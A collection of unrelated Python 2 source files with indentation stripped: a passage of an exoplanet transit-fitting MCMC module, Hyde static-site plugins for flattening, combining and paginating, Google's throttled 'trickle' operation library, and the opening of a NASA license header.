p0[...,0] = truncnorm.rvs(start,stop
,loc=rho,scale=rho_unc,size=nwalkers)
p0[...,1] = np.random.normal(loc=zpt,scale=zpt,size=nwalkers)
start,stop = (0.0 - ld1) / ld1_unc, (1.0 - ld1) / ld1_unc
p0[...,2] = truncnorm.rvs(start,stop
,loc=ld1,scale=ld1_unc,size=nwalkers)
start,stop = (0.0 - ld2) / ld2_unc, (1.0 - ld2) / ld2_unc
p0[...,3] = truncnorm.rvs(start,stop
,loc=ld2,scale=ld2_unc,size=nwalkers)
for i in xrange(self.nplanets):
(T0,per,b,rprs,ecosw,
esinw) = self.fit_sol[i*6+4+addval:i*6 + 10+addval]
b = 0.2
ecosw = 0.0
esinw = 0.0
p0[...,i*6+4+addval] = np.random.normal(
T0,T0_unc,size=nwalkers)
p0[...,i*6+5+addval] = np.random.normal(
per,per_unc,size=nwalkers)
start,stop = (0.0 - b) / b_unc, (0.5 - b) / b_unc
p0[...,i*6+6+addval] = truncnorm.rvs(
start,stop
,loc=b,scale=b_unc,size=nwalkers)
start,stop = (0.0 - rprs) / rprs_unc, (0.5 - rprs) / rprs_unc
p0[...,i*6+7+addval] = truncnorm.rvs(
start,stop
,loc=rprs,scale=rprs_unc,size=nwalkers)
start,stop = (0.0 - ecosw) / ecosw_unc, (0.5 - ecosw) / ecosw_unc
p0[...,i*6+8+addval] = truncnorm.rvs(
start,stop
,loc=ecosw,scale=ecosw_unc,size=nwalkers)
start,stop = (0.0 - esinw) / esinw_unc, (0.5 - esinw) / esinw_unc
p0[...,i*6+9+addval] = truncnorm.rvs(
start,stop
,loc=esinw,scale=esinw_unc,size=nwalkers)
#this is the jitter term
#make it like self.err
errterm = np.median(self.err)
start,stop = 0.0,10.
p0[...,-1] = truncnorm.rvs(start,stop,
loc=0.0,scale=0.1*errterm,size=nwalkers)
return p0
def cut_non_transit(self,ntdur=10):
#make a mask for each planet candidate
self.onlytransits = True
tregion = np.zeros(self.nplanets)
maskdat = np.zeros([self.npt,self.nplanets],dtype=bool)
if self.n_ldparams == 2:
addval = 0
elif self.n_ldparams == 4:
addval = 2
for i in xrange(self.nplanets):
T0 = self.fit_sol[i*6 + 4+addval]
per = self.fit_sol[i*6 + 5+addval]
rho = self.fit_sol[0]
ars = self.get_ar(rho,per)
tdur_dys = (1./ars) * per * (1./np.pi)
#this is buggy because T0 is not nessessarily time of first transit
#but time of a transit. So fudge.
#subtract make T0 the first transit
time0 = np.copy(T0)
while True:
if time0 - per < self.time[0]:
break
else:
time0 = time0 - per
ntransits = int((self.time[-1] - self.time[0]) / per) + 1
t_times = np.arange(ntransits)*per + T0
#make sure the first and last transit are not excluded even if
#partially in the data
t_times = np.r_[t_times,t_times[0] - per,t_times[-1] + per]
for j in t_times:
maskdat[:,i] = np.logical_or(maskdat[:,i],
np.logical_and(
self.time < j +tdur_dys*ntdur,
self.time > j - tdur_dys*ntdur) )
tregion[i] = ntdur*tdur_dys
#create a final mask that is the OR of the
#individual masks
finmask = np.zeros(self.npt)
for i in xrange(self.nplanets):
finmask = np.logical_or(finmask,maskdat[:,i])
self.time = self.time[finmask]
self.flux = self.flux[finmask]
self.err = self.err[finmask]
self._itime = self._itime[finmask]
self._datatype = self._datatype[finmask]
self.tregion = tregion
def get_ar(rho,period):
""" gets a/R* from period and mean stellar density"""
G = 6.67E-11
rho_SI = rho * 1000.
tpi = 3. * np.pi
period_s = period * 86400.
part1 = period_s**2 * G * rho_SI
ar = (part1 / tpi)**(1./3.)
return ar
def logchi2(fitsol,nplanets,rho_0,rho_0_unc,rho_prior,
flux,err,fixed_sol,time,itime,ntt,tobs,omc,datatype,
onlytransits=False,tregion=0.0):
#here are some priors to keep values sensible
rho = fitsol[0]
if rho < 0.0001 or rho > 100.:
return -np.inf
rprs = fitsol[np.arange(nplanets)*6 + 5]
if np.any(rprs < 0.) or np.any(rprs > 0.5):
return -np.inf
ecosw = fitsol[np.arange(nplanets)*6 + 6]
if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
return -np.inf
esinw = fitsol[np.arange(nplanets)*6 + 7]
if np.any(esinw < -1.0) or np.any(esinw > 1.0):
return -np.inf
#avoid parabolic orbits
ecc = np.sqrt(esinw**2 + ecosw**2)
if np.any(ecc > 1.0):
return -np.inf
#avoid orbits where the planet enters the star
per = fitsol[np.arange(nplanets)*6 + 3]
ar = get_ar(rho,per)
if np.any(ecc > (1.-(1./ar))):
return -np.inf
b = fitsol[np.arange(nplanets)*6 + 4]
if np.any(b < 0.) or np.any(b > 1.0 + rprs):
return -np.inf
if onlytransits:
T0 = fitsol[np.arange(nplanets)*6 + 2]
if np.any(T0 < T0 - tregion) or np.any(T0 > T0 + tregion):
return -np.inf
model_lc = calc_model(fitsol,nplanets,fixed_sol,
time,itime,ntt,tobs,omc,datatype)
if rho_prior:
chi2prior = (rho_0 - rho)**2 / rho_0_unc**2
else:
chi2prior = 0.0
ecc[ecc == 0.0] = 1.E-10
chi2ecc = np.log(1. / ecc)
chi2val = np.sum((model_lc - flux)**2 / err**2)
chi2const = np.log(1. / (np.sqrt(2.*np.pi) * np.mean(err)))
chi2tot = (-chi2val/2.) + chi2prior
#include eccentricity in the prior
#having np.log(chi2ecc) -> e**(-chi2/2) / ecc
logp = chi2tot + np.sum(chi2ecc)
return logp
def calc_model(fitsol,nplanets,fixed_sol,time,itime,ntt,tobs,omc,datatype):
sol = np.zeros([8 + 10*nplanets])
rho = fitsol[0]
zpt = fitsol[1]
ld1,ld2,ld3,ld4 = fixed_sol[0:4]
dil = fixed_sol[4]
veloffset = fixed_sol[5]
fixed_stuff = fixed_sol[6:10]
sol[0:8] = np.array([rho,ld1,ld2,ld3,ld4,
dil,veloffset,zpt])
for i in xrange(nplanets):
sol[8+(i*10):8+(i*10)+10] = np.r_[fitsol[2+i*6:8+i*6],fixed_stuff]
tmodout = tmod.transitmodel(nplanets,sol,time,itime,
ntt,tobs,omc,datatype)
return tmodout - 1.
def logchi2_paramprior(fitsol,nplanets,rho_0,rho_0_unc,rho_prior,
teff_0,teff_0_unc,logg_0,logg_0_unc,feh_0,feh_0_unc,
flux,err,fixed_sol,time,itime,ntt,tobs,omc,datatype,
n_ldparams=2,ldfileloc='/Users/tom/svn_code/tom_code/',
onlytransits=False,tregion=0.0):
minf = -np.inf
#here are some priors to keep values sensible
rho = fitsol[0]
if rho < 1.E-6 or rho > 100.:
return minf
teff = fitsol[2]
if teff < 3500 or teff > 50000.:
return minf
logg = fitsol[3]
if logg < 0.0 or logg > 5.:
return minf
feh = fitsol[4]
if feh < -5. or feh > 1.:
return minf
rprs = fitsol[np.arange(nplanets)*6 + 8]
if np.any(rprs < 0.) or np.any(rprs > 0.5):
return minf
ecosw = fitsol[np.arange(nplanets)*6 + 9]
if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
return minf
esinw = fitsol[np.arange(nplanets)*6 + 10]
if np.any(esinw < -1.0) or np.any(esinw > 1.0):
return minf
#avoid parabolic orbits
ecc = np.sqrt(esinw**2 + ecosw**2)
if np.any(ecc > 1.0):
return minf
#avoid orbits where the planet enters the star
per = fitsol[np.arange(nplanets)*6 + 6]
ar = get_ar(rho,per)
if np.any(ecc > (1.-(1./ar))):
return minf
b = fitsol[np.arange(nplanets)*6 + 7]
if np.any(b < 0.) or np.any(b > 1.0 + rprs):
return minf
if onlytransits:
T0 = fitsol[np.arange(nplanets)*6 + 5]
if np.any(T0 < T0 - tregion) or np.any(T0 > T0 + tregion):
return minf
#calc thing limb darkening here
if n_ldparams == 2:
#if teff < 3500 and logg >= 3.5:
if False:
#this block should never run
ldfile = ldfileloc + 'claret-quad-phoenix.txt'
ld1,ld2 = ld_quad(ldfile,
teff,logg)
ld3 = 0.0
ld4 = 0.0
#elif logg < 3.5 or teff >= 3500:
if True:
ldfile = ldfileloc + 'claret-limb-quad.txt'
ld1,ld2 = claretquad(ldfile,
teff,logg,feh)
ld3 = 0.0
ld4 = 0.0
elif n_ldparams == 4:
ldfile = ldfileloc + 'claret-limb.txt'
ld1,ld2,ld3,ld4 = claretlimb4p(ldfile,
teff,logg,feh)
lds = np.array([ld1,ld2,ld3,ld4])
fitsol_model_calc = np.r_[fitsol[0:2],fitsol[5:]]
fixed_sol_model_calc = np.r_[lds,fixed_sol]
model_lc = calc_model(fitsol_model_calc,nplanets,fixed_sol_model_calc,
time,itime,ntt,tobs,omc,datatype)
if rho_prior:
rho_prior = (rho_0 - rho)**2 / rho_0_unc**2
#teff_prior = (teff_0 - teff)**2 / teff_0_unc**2
#logg_prior = (logg_0 - logg)**2 / logg_0_unc**2
#feh_prior = (feh_0 - feh)**2 / feh_0_unc**2
#chi2prior = rho_prior+teff_prior+logg_prior+feh_prior
else:
rho_prior = 0.0
teff_prior = (teff_0 - teff)**2 / teff_0_unc**2
logg_prior = (logg_0 - logg)**2 / logg_0_unc**2
feh_prior = (feh_0 - feh)**2 / feh_0_unc**2
chi2prior = -0.5*(rho_prior+teff_prior+logg_prior+feh_prior)
ecc[ecc == 0.0] = 1.E-10
chi2ecc = np.log(1. / ecc)
chi2val = -0.5*np.sum(((model_lc - flux)* (model_lc - flux))
/ (err*err))
#chi2const = np.log(np.sum(1./(np.sqrt(2.*np.pi)*err)))
chi2const = 0.0
chi2tot = chi2const + chi2val + chi2prior
#include eccentricity in the prior
#having np.log(chi2ecc) -> e**(-chi2/2) / ecc
logp = chi2tot + np.sum(chi2ecc)
return logp
def logchi2_fitldp(fitsol,nplanets,rho_0,rho_0_unc,rho_prior,
ld1_0,ld1_0_unc,ld2_0,ld2_0_unc,ldp_prior,
flux,err,fixed_sol,time,itime,ntt,tobs,omc,datatype,
n_ldparams=2,ldfileloc='/Users/tom/svn_code/tom_code/',
onlytransits=False,tregion=0.0):
minf = -np.inf
#here are some priors to keep values sensible
rho = fitsol[0]
if rho < 1.E-6 or rho > 100.:
return minf
ld1 = fitsol[2]
ld2 = fitsol[3]
#some lind darkening constraints
#from Burke et al. 2008 (XO-2b)
if ld1 < 0.0:
return minf
if ld1 + ld2 > 1.0:
return minf
if ld1 + 2.*ld2 < 0.0:
return minf
if ld2 < -0.8:
return minf
if n_ldparams == 2:
ld3, ld4 = 0.0,0.0
addval = 0
elif n_ldparams == 4:
ld3 = fitsol[4]
ld4 = fitsol[5]
addval = 2
rprs = fitsol[np.arange(nplanets)*6 + 7 + addval]
if np.any(rprs < 0.) or np.any(rprs > 0.5):
return minf
ecosw = fitsol[np.arange(nplanets)*6 + 8+addval]
if np.any(ecosw < -1.0) or np.any(ecosw > 1.0):
return minf
esinw = fitsol[np.arange(nplanets)*6 + 9+addval]
if np.any(esinw < -1.0) or np.any(esinw > 1.0):
return minf
#avoid parabolic orbits
ecc = np.sqrt(esinw**2 + ecosw**2)
if np.any(ecc > 1.0):
return minf
#avoid orbits where the planet enters the star
per = fitsol[np.arange(nplanets)*6 + 5+addval]
ar = get_ar(rho,per)
if np.any(ecc > (1.-(1./ar))):
return minf
b = fitsol[np.arange(nplanets)*6 + 6+addval]
if np.any(b < 0.) or np.any(b > 1.0 + rprs):
return minf
if onlytransits:
T0 = fitsol[np.arange(nplanets)*6 + 4+addval]
if np.any(T0 < T0 - tregion) or np.any(T0 > T0 + tregion):
return minf
jitter = fitsol[-1]
if jitter < 0.0:
return minf
err_jit = np.sqrt(err**2 + jitter**2)
err_jit2 = err**2 + jitter**2
lds = np.array([ld1,ld2,ld3,ld4])
fitsol_model_calc = np.r_[fitsol[0:2],fitsol[4:]]
fixed_sol_model_calc = np.r_[lds,fixed_sol]
model_lc = calc_model(fitsol_model_calc,nplanets,fixed_sol_model_calc,
time,itime,ntt,tobs,omc,datatype)
# if rho_prior:
# rhoprior = (rho_0 - rho)**2 / rho_0_unc**2
# else:
# rhoprior = 0.0
# if ldp_prior:
# ldprior1 = (ld1_0 - ld1)*(ld1_0 - ld1) / ld1_0_unc**2
# ldprior2 = (ld2_0 - ld2)*(ld2_0 - ld2) / ld2_0_unc**2
# ldprior = ldprior1 + ldprior2
# else:
# ldprior = 0.0
# chi2prior = -0.5*(rhoprior+ldprior)
ecc[ecc == 0.0] = 1.E-10
#chi2ecc = np.log(1. / ecc)
# chi2val = -0.5*np.sum(((model_lc - flux)* (model_lc - flux))
# / (err_jit*err_jit))
# chi2const = -1.0*np.sum(np.log(err_jit))
# #chi2const = 0.0
# chi2tot = chi2const + chi2val + chi2prior
# #include eccentricity in the prior
# #having np.log(chi2ecc) -> e**(-chi2/2) / ecc
# logp = chi2tot + np.sum(chi2ecc)
npt_lc = len(err_jit)
loglc = (
- (npt_lc/2.)*np.log(2.*np.pi)
- 0.5 * np.sum(np.log(err_jit2))
- 0.5 * np.sum((model_lc - flux)**2 / err_jit2)
)
if rho_prior:
logrho = (
- 0.5 * np.log(2.*np.pi)
- 0.5 * np.log(rho_0_unc**2)
- 0.5 * (rho_0 - rho)**2 / rho_0_unc**2
)
else:
rho_prior = 0.0
if ldp_prior:
logld1 = (
- 0.5 * np.log(2.*np.pi)
- 0.5 * np.log(ld1_0_unc**2)
- 0.5 * (ld1_0 - ld1)**2 / ld1_0_unc**2
)
logld2 = (
- 0.5 * np.log(2.*np.pi)
- 0.5 * np.log(ld2_0_unc**2)
- 0.5 * (ld2_0 - ld2)**2 / ld2_0_unc**2
)
logldp = logld1 + logld2
else:
logldp = 0.0
logecc = - np.sum(np.log(ecc))
logLtot = loglc + logrho + logldp + logecc
return logLtot
# def calc_model_paramprior(fitsol,nplanets,fixed_sol,time,itime,ntt,tobs,omc,datatype):
# sol = np.zeros([8 + 10*nplanets])
# rho = fitsol[0]
# zpt = fitsol[1]
# ld1,ld2,ld3,ld4 = fixed_sol[0:4]
# dil = fixed_sol[4]
# veloffset = fixed_sol[5]
# fixed_stuff = fixed_sol[6:10]
# sol[0:8] = np.array([rho,ld1,ld2,ld3,ld4,
# dil,veloffset,zpt])
# for i in xrange(nplanets):
# sol[8+(i*10):8+(i*10)+10] = np.r_[fitsol[2+i*6:8+i*6],fixed_stuff]
# tmodout = tmod.transitmodel(nplanets,sol,time,itime,
# ntt,tobs,omc,datatype)
# return tmodout - 1.
def get_stats(par_arr,noprint=False):
par_arr
onesig = (1. - 0.682689492) / 2.
twosig = (1. - 0.954499736) / 2.
threesig = (1. - 0.997300204) / 2.
med = np.median(par_arr)
stdev = np.std(par_arr)
sort_arr = np.sort(par_arr)
nval = len(par_arr)
m1 = med - sort_arr[np.floor(onesig * nval)]
p1 = sort_arr[np.floor(nval - (onesig * nval))] - med
m2 = med - sort_arr[np.floor(twosig * nval)]
p2 = sort_arr[np.floor(nval - (twosig * nval))] - med
m3 = med - sort_arr[np.floor(threesig * nval)]
p3 = sort_arr[np.floor(nval - (threesig * nval))] - med
ninefivelow = sort_arr[np.floor(0.025*nval)]
ninefivehigh = sort_arr[np.floor(0.975*nval)]
if not noprint:
print '95percent credible interval = %s - %s' %(ninefivelow,ninefivehigh)
return np.array([med,stdev,p1,m1,p2,m2,p3,m3])
def model_real_paramprior(rho,zpt,teff,logg,feh,T0,
per,b,rprs,ecosw,esinw,
time,itime,ntt,tobs,omc,datatype,
n_ldparams=2,
ldfileloc='/Users/tom/svn_code/tom_code/'):
ldfile = ldfileloc + 'claret-limb-quad.txt'
ld1,ld2 = claretquad(ldfile,teff,logg,feh)
ld3 = 0.0
ld4 = 0.0
dil=0.0
veloffset = 0.0
rvamp = 0.0
occ = 0.0
ell = 0.0
alb = 0.0
nplanets = 1
sol = np.array([rho,ld1,ld2,ld3,ld4,
dil,veloffset,zpt,T0,per,b,rprs,ecosw,esinw,
rvamp,occ,ell,alb])
tmodout = tmod.transitmodel(nplanets,sol,time,itime,
ntt,tobs,omc,datatype) - 1.0
return tmodout
def testtom(t,num):
rho,zpt,teff,logg,feh,T0,per,b,rprs,ecosw,esinw = (t[...,num])
mod = model_real_paramprior(rho,zpt,teff,logg,feh,T0,per,b,rprs,ecosw,
esinw,M.time,M._itime,M._ntt,M._tobs,M._omc,M._datatype,
n_ldparams=2,ldfileloc='/Users/tom/svn_code/tom_code/')
q,f = get_qf(M.time,a,per,T0)
plt.plot(q,f,alpha=0.5)
def run_crap(t):
for num in random.choice(np.arange(len(t[1])),size=10):
testtom(t,num)
q,f = get_qf(M.time,M.flux,per,T0)
plt.scatter(q,f,s=1,color='k',alpha=0.2)
def get_qf(time,flux,period,epoch):
date1 = (time - epoch) + 0.5*period
phi1 = (((date1 / period) - np.floor(date1/period)) * 24. * period) - 12*period
q1 = np.sort(phi1)
f1 = (flux[np.argsort(phi1)]) * 1.E6
return q1, f1
| |
# -*- coding: utf-8 -*-
"""
Plugins related to structure
"""
from hyde._compat import reduce
from hyde.ext.plugins.meta import Metadata
from hyde.plugin import Plugin
from hyde.site import Resource
from hyde.util import pairwalk
from fswrap import File, Folder
import os
from fnmatch import fnmatch
import operator
#
# Folder Flattening
#
class FlattenerPlugin(Plugin):
"""
The plugin class for flattening nested folders.
"""
def __init__(self, site):
super(FlattenerPlugin, self).__init__(site)
def begin_site(self):
"""
Finds all the folders that need flattening and changes the
relative deploy path of all resources in those folders.
"""
items = []
try:
items = self.site.config.flattener.items
except AttributeError:
pass
for item in items:
node = None
target = ''
try:
node = self.site.content.node_from_relative_path(item.source)
target = Folder(item.target)
except AttributeError:
continue
if node:
for resource in node.walk_resources():
target_path = target.child(resource.name)
self.logger.debug(
'Flattening resource path [%s] to [%s]' %
(resource, target_path))
resource.relative_deploy_path = target_path
for child in node.walk():
child.relative_deploy_path = target.path
#
# Combine
#
class CombinePlugin(Plugin):
"""
To use this combine, the following configuration should be added
to meta data::
combine:
sort: false #Optional. Defaults to true.
root: content/media #Optional. Path must be relative to content
folder - default current folder
recurse: true #Optional. Default false.
files:
- ns1.*.js
- ns2.*.js
where: top
remove: yes
`files` is a list of resources (or just a resource) that should be
combined. Globbing is performed. `where` indicate where the
combination should be done. This could be `top` or `bottom` of the
file. `remove` tell if we should remove resources that have been
combined into the resource.
"""
def __init__(self, site):
super(CombinePlugin, self).__init__(site)
def _combined(self, resource):
"""
Return the list of resources to combine to build this one.
"""
try:
config = resource.meta.combine
except AttributeError:
return [] # Not a combined resource
try:
files = config.files
except AttributeError:
raise AttributeError("No resources to combine for [%s]" % resource)
if type(files) is str:
files = [files]
# Grab resources to combine
# select site root
try:
root = self.site.content.node_from_relative_path(
resource.meta.combine.root)
except AttributeError:
root = resource.node
# select walker
try:
recurse = resource.meta.combine.recurse
except AttributeError:
recurse = False
walker = root.walk_resources() if recurse else root.resources
# Must we sort?
try:
sort = resource.meta.combine.sort
except AttributeError:
sort = True
if sort:
resources = sorted([r for r in walker
if any(fnmatch(r.name, f) for f in files)],
key=operator.attrgetter('name'))
else:
resources = [(f, r)
for r in walker for f in files if fnmatch(r.name, f)]
resources = [r[1] for f in files for r in resources if f in r]
if not resources:
self.logger.debug("No resources to combine for [%s]" % resource)
return []
return resources
def begin_site(self):
"""
Initialize the plugin and search for the combined resources
"""
for node in self.site.content.walk():
for resource in node.resources:
resources = self._combined(resource)
if not resources:
continue
# Build depends
if not hasattr(resource, 'depends'):
resource.depends = []
resource.depends.extend(
[r.relative_path for r in resources
if r.relative_path not in resource.depends])
# Remove combined resources if needed
if hasattr(resource.meta.combine, "remove") and \
resource.meta.combine.remove:
for r in resources:
self.logger.debug(
"Resource [%s] removed because combined" % r)
r.is_processable = False
def begin_text_resource(self, resource, text):
"""
When generating a resource, add combined file if needed.
"""
resources = self._combined(resource)
if not resources:
return
where = "bottom"
try:
where = resource.meta.combine.where
except AttributeError:
pass
if where not in ["top", "bottom"]:
raise ValueError("%r should be either `top` or `bottom`" % where)
self.logger.debug(
"Combining %d resources for [%s]" % (len(resources),
resource))
if where == "top":
return "".join([r.source.read_all() for r in resources] + [text])
else:
return "".join([text] + [r.source.read_all() for r in resources])
#
# Pagination
#
class Page:
def __init__(self, posts, number):
self.posts = posts
self.number = number
class Paginator:
"""
Iterates resources which have pages associated with them.
"""
file_pattern = 'page$PAGE/$FILE$EXT'
def __init__(self, settings):
self.sorter = getattr(settings, 'sorter', None)
self.size = getattr(settings, 'size', 10)
self.file_pattern = getattr(
settings, 'file_pattern', self.file_pattern)
def _relative_url(self, source_path, number, basename, ext):
"""
Create a new URL for a new page. The first page keeps the same name;
the subsequent pages are named according to file_pattern.
"""
path = File(source_path)
if number != 1:
filename = self.file_pattern.replace('$PAGE', str(number)) \
.replace('$FILE', basename) \
.replace('$EXT', ext)
path = path.parent.child(os.path.normpath(filename))
return path
def _new_resource(self, base_resource, node, page_number):
"""
Create a new resource as a copy of a base_resource, with a page of
resources associated with it.
"""
res = Resource(base_resource.source_file, node)
res.node.meta = Metadata(node.meta)
res.meta = Metadata(base_resource.meta, res.node.meta)
brs = base_resource.source_file
path = self._relative_url(base_resource.relative_path,
page_number,
brs.name_without_extension,
brs.extension)
res.set_relative_deploy_path(path)
return res
@staticmethod
def _attach_page_to_resource(page, resource):
"""
Hook up a page and a resource.
"""
resource.page = page
page.resource = resource
@staticmethod
def _add_dependencies_to_resource(dependencies, resource):
"""
Add a bunch of resources as dependencies to another resource.
"""
if not hasattr(resource, 'depends'):
resource.depends = []
resource.depends.extend([dep.relative_path for dep in dependencies
if dep.relative_path not in resource.depends])
def _walk_pages_in_node(self, node):
"""
Segregate each resource into a page.
"""
walker = 'walk_resources'
if self.sorter:
walker = 'walk_resources_sorted_by_%s' % self.sorter
walker = getattr(node, walker, getattr(node, 'walk_resources'))
posts = list(walker())
number = 1
while posts:
yield Page(posts[:self.size], number)
posts = posts[self.size:]
number += 1
def walk_paged_resources(self, node, resource):
"""
Group the resources and return the new page resources.
"""
added_resources = []
pages = list(self._walk_pages_in_node(node))
resource.pages = pages
if pages:
deps = reduce(list.__add__, [page.posts for page in pages], [])
Paginator._attach_page_to_resource(pages[0], resource)
Paginator._add_dependencies_to_resource(deps, resource)
for page in pages[1:]:
# make new resource
new_resource = self._new_resource(resource, node, page.number)
Paginator._attach_page_to_resource(page, new_resource)
new_resource.depends = resource.depends
added_resources.append(new_resource)
new_resource.pages = pages
for prev, next in pairwalk(pages):
next.previous = prev
prev.next = next
return added_resources
class PaginatorPlugin(Plugin):
"""
Paginator plugin.
Configuration: in a resource's metadata:
paginator:
sorter: time
size: 5
file_pattern: page$PAGE/$FILE$EXT # optional
then in the resource's content:
{% for res in resource.page.posts %}
{% refer to res.relative_path as post %}
{{ post }}
{% endfor %}
{{ resource.page.previous }}
{{ resource.page.next }}
"""
def __init__(self, site):
super(PaginatorPlugin, self).__init__(site)
def begin_site(self):
for node in self.site.content.walk():
added_resources = []
paged_resources = (res for res in node.resources
if hasattr(res, "meta") and
hasattr(res.meta, 'paginator'))
for resource in paged_resources:
paginator = Paginator(resource.meta.paginator)
added_resources += paginator.walk_paged_resources(
node, resource)
node.resources += added_resources
| |
# Copyright 2006 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library to allow for long running, slow operations.
Intended mainly for database operations, this library provides a
skeleton to safely execute a given set of operations such that the
runtime is a fraction of realtime (such as N% utilization). It is
designed to keep track of its position and be restartable, though that
is dependent upon the class that subclasses TrickledOperation.
"""
__author__ = 'bbiskebo@google.com (Brian Biskeborn)'
# Original author: chip@google.com (Chip Turner)
import logging
import time
class TrickledOperation(object):
"""The class representing both how a trickle operation is performed and
the state associated with a given operation.
Users of this class will subclass it and implement the protected
methods _SetupTrickle, _Finished, _PerformTrickle, and
_FinalizeTrickle. These methods will be called during a trickle
operation such that the size of the batch passed to _PerformTrickle
tries to be exactly utilization_percent of each cycle_time.
Specifying utilization_percent=100 turns off all sleeping, and
does the work at maximum speed.
"""
def __init__(self, utilization_percent, cycle_time):
"""Constructor. Subclass and store operation-specific state here.
Args:
utilization_percent: percent of time to spend in _PerformTrickle
cycle_time: interval over which utilization_percent is
calculated per run
"""
self._utilization_fraction = utilization_percent / 100.0
self._cycle_time = cycle_time
self._batch_size = 1 # Start maximally cautious (single statement)
# and increase batch size as we can
self._batch_size_limit = 1000000
self.verbose = True
def _SetupTrickle(self):
"""A setup method, invoked before a trickle loop is run.
It is valid to execute multiple loops, and this method will be
invoked for each. Useful for finding the next starting position.
"""
raise NotImplementedError('call to pure virtual function')
def _FinalizeTrickle(self):
"""A completion method copied after a series of trickle loops.
Intended to finish up state, such as the final 'slosh' rows of a
continual copy loop.
"""
raise NotImplementedError('call to pure virtual function')
def _Finished(self):
"""Called to determine if a trickle is complete."""
raise NotImplementedError('call to pure virtual function')
def _PerformTrickle(self, batch_size):
"""The method invoked to perform the actual trickle operation.
This method will be invoked multiple times and is passed the size
of a batch to execute, which will vary depending upon the runtime
of the previous batch.
Args:
batch_size: size of the current batch (subclass dependent)
Returns:
number of items processed (usually batch_size)
"""
raise NotImplementedError('call to pure virtual function')
def _GetProgress(self):
"""Called to fetch progress information
This method is intended to be overridden by inheriting classes
that can provide data about their progress through the trickle.
Args:
none
Returns:
String representation of current progress state or None if unknown
"""
return None
def SetBatchSizeLimit(self, n):
"""Set the maximum batch_size that will ever be submitted by Trickle().
Intended for operations that need to be artificially slowed down in
excess of what the throttler would have done. For instance, when
replicas are drastically slower than the primary for some reason, which
the throttler will be unable to detect.
Args:
n: How many queries may be run in a batch. Values above 1000000 are
probably ill-advised.
"""
self._batch_size_limit = n
def Trickle(self):
"""Perform the actual trickle operation.
This function will loop until self._Finished() returns true. It
calls the above methods in this order:
self._SetupTrickle()
while not self._Finished():
...
self._PerformTrickle(self, batch_size)
...
self._FinalizeTrickle()
Args:
None
Returns:
None
"""
self._SetupTrickle()
# track the last ten cycles worth of copy rates
copy_rates = [0] * 10
copy_rate_idx = 0
# also track average copies over this invocation's lifetime
rows_copied = 0
start_time = time.time()
while not self._Finished():
then = time.time()
batch_size = self._batch_size
rowcount = self._PerformTrickle(batch_size)
# Increase or decrease batch size to get the target utilization
# percentage at the given cycle time. At all times, we're cautious about
# floating point rounding effects and the like.
time_delta = time.time() - then
ideal_delta = self._cycle_time * self._utilization_fraction
if time_delta > 2.0 * ideal_delta:
# If our utilization fraction is way too high, we want to decrease our
# batch size fairly drastically, but we don't want to chop things to
# nothing in case what we saw was a transient blip. Note that if we get
# here, either (a) we've seen enough short statements to increase our
# batch size from its initial value of 1 before hitting this, or (b) a
# batch size of 1 is still way too big, in which case we modulate cycle
# time below instead.
self._batch_size = max(int(batch_size/2), 1)
elif time_delta * 1.5 < ideal_delta:
# We don't want to increase batch size quite as drastically
self._batch_size = max(int(batch_size * 1.5), batch_size + 1)
else:
# batch_size is between 2x and 0.67x target. Modulate it directly to
# the target value.
self._batch_size = max(int(batch_size * ideal_delta / time_delta), 1)
# Rev limiter in case an operation is a no-op by accident.
self._batch_size = min(self._batch_size, self._batch_size_limit)
# How long are we going to sleep this time? At least the rest of the
# cycle time, longer if utilization would otherwise be too high, and
# at least one second regardless but no more than 2x the cycle time.
if self._utilization_fraction < 1.0:
sleep_time = min(
max(self._cycle_time - time_delta,
(time_delta / self._utilization_fraction) - time_delta,
1),
2 * self._cycle_time)
else:
# But if running with 100% utilization, don't sleep at all.
sleep_time = 0.0
# update average copy rate
this_batch_rate = batch_size / (sleep_time + time_delta)
copy_rates[copy_rate_idx] = this_batch_rate
copy_rate_idx = (copy_rate_idx + 1) % len(copy_rates)
current_rate_avg = sum(copy_rates) / float(len(copy_rates))
rows_copied += rowcount
if self.verbose:
self._LogStatus(batch_size, start_time, time_delta, sleep_time,
current_rate_avg, rows_copied, copy_rate_idx)
time.sleep(sleep_time)
if self.verbose:
self._LogFinish(rows_copied, start_time)
self._FinalizeTrickle()
def _LogStatus(self, batch_size, start_time, time_delta, sleep_time,
current_rate_avg, rows_copied, copy_rate_idx):
progress = self._GetProgress()
if progress:
progress = ', ' + progress
else:
progress = ''
logging.info('batch of %d in %.2f s%s, sleeping %.2f s'
% (batch_size, time_delta, progress, sleep_time))
logging.info('util %.2f, new batch size %d '
'(%.2f current, %.2f avg rows/sec)'
% (time_delta / (time_delta + sleep_time),
self._batch_size,
current_rate_avg,
rows_copied / (time.time() - start_time)))
def _LogFinish(self, rows_copied, start_time):
logging.info('Done: %.2f avg rows/sec',
(rows_copied / (time.time() - start_time)))
class GeneratorOperation(TrickledOperation):
"""Adapts blocking functions so they can run within trickle_lib.
The adapter only requires that users insert a 'yield' statement after each
entry in the batch has been processed.
"""
def __init__(self, generator, utilization_percent, cycle_time):
"""Constructor.
Args:
generator: A function, that does work every time every time it is iterated
over.
utilization_percent: An int, percent of time to spend in _PerformTrickle.
cycle_time: interval over which utilization_percent is
calculated per run
"""
TrickledOperation.__init__(self, utilization_percent, cycle_time)
self._generator = generator
self._finished = False
def _SetupTrickle(self):
pass
def _FinalizeTrickle(self):
pass
def _Finished(self):
return self._finished
def _PerformTrickle(self, batch_size):
processed = 0
try:
for _ in xrange(batch_size):
self._generator.next()
processed += 1
except StopIteration:
self._finished = True
return processed
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
